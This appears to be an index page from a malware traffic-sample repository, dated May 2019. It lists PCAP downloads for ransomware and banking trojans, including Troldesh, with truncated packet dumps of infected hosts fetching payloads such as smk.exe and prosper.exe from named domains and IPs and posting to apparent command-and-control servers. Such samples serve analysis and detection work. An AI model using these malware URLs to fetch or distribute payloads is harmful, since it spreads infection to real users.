smk.exe systemswift.group Ransomware Malware Trojan Download PCAP file Download Traffic Sample

2019-05-30 00:27:40.790210 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3141076432:3141076852, ack 132281672, win 16425, length 420: HTTP: GET /smk.exe HTTP/1.1 E…..@….. . . . .. .P.9….uHP.@)D…GET /smk.exe HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Accept-Encoding: gzip, deflate Host: 10.1.10.224 Connection: Keep-Alive 2019-05-30 00:27:41.270451 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 91981:92976, ack 420, win 237, length 995: HTTP E…..@.@.DX . . . ..P. …..9.tP…+………………………………………………………………………………………………………………………………………………………………………………………………. ………………………………………………………………………………………………………………………………………………………………………………………………………………. ………………………………………………………………………………………………………………P.,…….00………… ………………..h……….. .. …. …. …….00…. ..%…………. […]

GET /sim.o t-trade.net Financial Stock Banking Malware Trojan PCAP file download sample

2019-05-29 21:16:12.610658 IP 10.1.10.162.60446 > 185.219.42.154.80: Flags [P.], seq 649603156:649603684, ack 3701990316, win 16425, length 528: HTTP: GET /sim.o HTTP/1.1 E..8w.@….. . …*….P&.(T….P.@)….GET /sim.o HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Accept-Encoding: gzip, deflate Range: bytes=240615- Unless-Modified-Since: Wed, 29 May 2019 23:56:47 GMT If-Range: “10d200-58a0f88c11a17” Host: t-trade.net Connection: Keep-Alive 2019-05-29 21:16:36.990639 IP 10.1.10.162.60447 > 77.222.57.253.80: Flags [P.], seq 1839010927:1839011208, ack 1315819563, win 16425, length 281: HTTP: POST /index.php HTTP/1.1 E..Ax.@….m . .M.9….Pm..oNm.+P.@)/…POST […]

POST /prosper/index.php evaglobal.eu prosper.exe Malware PCAP file download Traffic Sample

2019-05-30 00:41:38.457600 IP 10.1.10.162.49185 > 10.1.10.224.80: Flags [P.], seq 1430869096:1430869520, ack 1051603559, win 16425, length 424: HTTP: GET /prosper.exe HTTP/1.1 E…..@….. . . . ..!.PUITh>.2gP.@).$..GET /prosper.exe HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Accept-Encoding: gzip, deflate Host: 10.1.10.224 Connection: Keep-Alive 2019-05-30 00:42:14.087418 IP 10.1.10.162.49186 > 149.56.22.192.80: Flags [P.], seq 3640301184:3640301460, ack 3223405560, win 64240, length 276: HTTP: POST /prosper/index.php HTTP/1.1 E..<..@…8. . ..8…”.P…..!C.P…….POST /prosper/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT […]

copticorphans.org Ransomware Malware PCAP file download Traffic Sample

https://www.virustotal.com/fr/file/c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10/analysis/ SHA256: c7a14d6a1b72355952781787317f345753dab98c43b80127db2de62a89f0ce10 Nom du fichier : 1c.jpg Ratio de détection : 32 / 72 Date d’analyse : 2019-05-29 14:27:51 UTC (il y a 16 heures, 28 minutes) 2019-05-29 21:44:21.090952 IP 10.1.10.162.49185 > 93.191.156.122.80: Flags [P.], seq 2960318675:2960319109, ack 288044427, win 16425, length 434: HTTP: GET /blogs/media/1c.jpg HTTP/1.1 E…..@….n . .]..z.!.P.r…+5.P.@)E…GET /blogs/media/1c.jpg HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Accept-Encoding: gzip, deflate Host: vision4cph.com Connection: Keep-Alive 2019-05-29 21:44:21.204625 IP 93.191.156.122.80 > 10.1.10.162.49185: […]

TROLDESH Ransomware PCAP Download Traffic Sammple undergroundlabsuk.com 185.119.174.45

URLhaus Database URLhaus tries to identify the malware associated with the payload served by a certain malware URL. In case URLhaus is able to identify the associated malware family, the payload will be tagged accordingly (field signature). The page below gives you an overview on payloads that URLhaus has identified as Ransomware.Troldesh. 2019-05-29 21:53:52.091291 IP 10.1.10.162.49184 > 185.119.174.45.80: Flags [P.], seq 1195198762:1195199227, ack 4032472939, win 16425, length 465: HTTP: GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1 E…..@…{. . ..w.-. .PG=I*.Z.kP.@)….GET /wp-content/themes/Divi/et-pagebuilder/1c.j HTTP/1.1 Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; […]